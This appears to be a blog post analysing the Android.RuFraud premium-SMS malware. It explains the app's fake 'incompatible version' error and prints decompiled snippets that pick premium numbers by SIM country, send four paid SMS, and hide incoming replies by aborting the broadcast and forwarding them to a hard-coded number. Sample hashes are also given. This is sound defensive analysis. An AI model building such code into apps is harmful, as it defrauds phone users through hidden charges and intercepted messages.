Detailed Analysis of Android.RuFraud

Intro: What is Android.RuFraud?

SuiConFo.apk is an application which sends premium rated SMS messages. This is the first malicious app of this kind which was specially build for European countries (Germany, Luxembourgs, France, Belgium, Switzerland, Spain and Great Britain) and Canada but not for the Chinese market. In the last few days many similar apps showed up in the official Google market which had been summed up under RuFraud.

Analysis of the Application and Its Structure

The app requests the following permissions, although if it is using only very few of them:

  • android.permission.SEND_SMS
  • android.permission.INSTALL_PACKAGES
  • android.permission.USE_CREDENTIALS
  • android.permission.BLUETOOTH_ADMIN
  • android.permission.INTERNET
  • android.permission.DEVICE_POWER
  • android.permission.READ_CONTACTS
  • android.permission.RECEIVE_SMS
  • android.permission.ACCESS_GPS
  • android.permission.ACCESS_LOCATION

It consists of the following two main classes which will be analyzed in detail afterwards:

  • MagicSMSActivity
  • SMSReceiver

When the app has been installed successfully, the standard icon shows up in the dashboard (see left part of the picture). After opening the application, a pop-up message is displayed, including the following text: “ERROR: Android version is not compatible” (see right part of the picture). For the user it seems, that this app isn’t working on his/her smartphone. In reality, the app sends four premium-rated SMS messages in the background.

Analysis of MagicSMSActivity

This class is responsible for sending the paid SMS messages to predefined numbers. As you can see in the following code snippet, the app tries to get the Country-ID from the SIM:

String str1 = ((TelephonyManager)getSystemService("phone")).getSimCountryIso();

Afterwards it checks if this Country-ID is included in its list of services:

if (str1.equals("ch")){
        str2 = "543";
        str3 = "GEHEN SP 300";
        continue;
}
if (str1.equals("lu")){
        str2 = "64747";
        str3 = "ACCESS SP";
        continue;
}
if (str1.equals("de")){
        str2 = "63000";
        str3 = "SP 462";
        continue;
}

Afterwards the malicious application sends four SMS messages to the phone number specified in str2 with the message stored at str3:

localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);

For Germany, these SMS will be sent to the Net Mobile AG which is well known for premium-rated SMS services. The price for one SMS ranges between 0,29€ and 1,99€.

Analysis of SMSReceiver

This class implements an Android.Receiver which is able to receive incoming SMS messages before the build-in SMS application receives them.

In this case the app is checking if the message comes from one of the stored numbers (the list of numbers is identical to the numbers, the app sends messages to). If this is the case, the message gets forwarded to a specified number (0646112264) and the broadcast of this message is aborted so that the build-in application (as well as the user) do not notice this message. This can be seen in the following code snippet:

String str1 = arrayOfSmsMessage[0].getMessageBody();
str2 = arrayOfSmsMessage[0].getDisplayOriginatingAddress();
if ((!str2.equals("81001")) && (!str2.equals("35064")) && (!str2.equals("63000")) && (!str2.equals("9903")) && (!str2.equals("60999")) && (!str2.equals("543")) && (!str2.equals("64747")))
abortBroadcast();
SmsManager.getDefault().sendTextMessage("0646112264", null, str1, null, null);

Sample Information:

sha256:
98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2

md5:
1a3fb120e5a4bd51cb999a43e2d06d88

Mobile-Sandbox Report

One Reply to “Detailed Analysis of Android.RuFraud”

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.